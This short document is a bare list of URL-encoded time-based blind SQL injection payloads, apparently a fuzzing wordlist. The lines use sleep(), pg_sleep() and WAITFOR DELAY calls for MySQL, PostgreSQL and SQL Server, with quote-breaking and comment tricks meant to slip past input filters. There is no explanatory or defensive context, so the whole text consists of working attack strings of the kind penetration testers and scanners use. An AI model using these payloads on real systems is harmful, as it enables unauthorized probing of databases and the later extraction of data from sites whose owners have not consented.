XOR(if(now()=sysdate(),sleep(10),0))OR%27
if(now()=sysdate(),sleep(10),0)
(select(0)from(select(sleep(10)))v)/*%27+(select(3)from(select(sleep(10)))v)+%27%22+(select(0)from(select(sleep(10)))v)+%22*/
%27XOR(if(now()=sysdate(),sleep(10*1),0))XOR%27Z
1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))YYYY)%20AND%20%27%%27=%27
1%27XOR(if(now()=sysdate(),sleep(10),0))OR%27
1%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(10)))YYYY)-1337
1%20or%20sleep(10)%23
%27%20WAITFOR%20DELAY%20%270:0:10%27--
%%27;SELECT%20PG_SLEEP(10)--
pg_sleep(10)
%27|%20|pg_sleep(10)--
